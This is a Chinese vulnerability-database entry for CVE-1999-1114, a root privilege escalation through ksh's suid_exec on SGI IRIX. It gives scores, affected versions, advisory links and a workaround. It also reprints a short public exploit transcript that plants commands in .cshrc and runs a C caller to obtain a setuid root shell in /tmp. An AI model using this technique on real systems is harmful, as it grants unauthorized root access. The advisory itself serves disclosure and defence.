CVE-1999-1114
CVSS7.2
发布时间 :1998-04-08 00:00:00
修订时间 :2008-09-05 16:18:45
NMCOE    

[原文]Buffer overflow in Korn Shell (ksh) suid_exec program on IRIX 6.x and earlier, and possibly other operating systems, allows local users to gain root privileges.


[CNNVD]IRIX Korn Shell (ksh) suid_exec缓冲区溢出漏洞 (CNNVD-199804-011)

        IRIX6.x版本,或可能其他操作系统Korn Shell (ksh)上的suid_exec程序存在缓冲区溢出漏洞。本地用户可以利用该漏洞获得根权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:6.0.1SGI IRIX 6.0.1
cpe:/o:sgi:irix:6.3SGI IRIX 6.3
cpe:/o:sgi:irix:5.0
cpe:/o:sgi:irix:6.4SGI IRIX 6.4
cpe:/o:sgi:irix:5.0.1SGI IRIX 5.0.1
cpe:/o:sgi:irix:6.2SGI IRIX 6.2
cpe:/o:sgi:irix:5.2SGI IRIX 5.2
cpe:/o:sgi:irix:5.1SGI IRIX 5.1
cpe:/o:sgi:irix:5.1.1SGI IRIX 5.1.1
cpe:/o:sgi:irix:5.3SGI IRIX 5.3
cpe:/o:sgi:irix:6.0SGI IRIX 6.0
cpe:/o:sgi:irix:6.0.1::xfsSGI IRIX 6.0.1 XFS
cpe:/o:sgi:irix:6.1SGI IRIX 6.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1114
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1114
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199804-011
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/2100.php
(VENDOR_ADVISORY)  XF  ksh-suid_exec(2100)
http://www.securityfocus.com/bid/467
(VENDOR_ADVISORY)  BID  467
http://ciac.llnl.gov/ciac/bulletins/h-15a.shtml
(VENDOR_ADVISORY)  CIAC  H-15A
ftp://patches.sgi.com/support/free/security/advisories/19980405-01-I
(VENDOR_ADVISORY)  SGI  19980405-01-I
ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-96.17.suid_exec.vul
(UNKNOWN)  AUSCERT  AA-96.17

- 漏洞信息

IRIX Korn Shell (ksh) suid_exec缓冲区溢出漏洞
高危 缓冲区溢出
1998-04-08 00:00:00 2005-05-02 00:00:00
本地  
        IRIX6.x版本,或可能其他操作系统Korn Shell (ksh)上的suid_exec程序存在缓冲区溢出漏洞。本地用户可以利用该漏洞获得根权限。

- 公告与补丁

        

- 漏洞信息 (19353)

SGI IRIX <= 6.4 suid_exec Vulnerability (EDBID:19353)
irix local
1996-12-02 Verified
0 Yuri Volobuev
N/A [点击下载]
source: http://www.securityfocus.com/bid/467/info

A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root. 


% setenv | grep SHELL
SHELL=/bin/tcsh
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
^D
% cat > expl.c
main()
{
execl("/sbin/suid_exec","/bin/su","/bin/su",0);
}
^D
% cc expl.c -o expl.c
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*



  			

- 漏洞信息

1011
IRIX Korn Shell (ksh) suid_exec Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Workaround
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1996-12-02 Unknow
1996-12-02 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: chmod -s /sbin/suid_exec

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站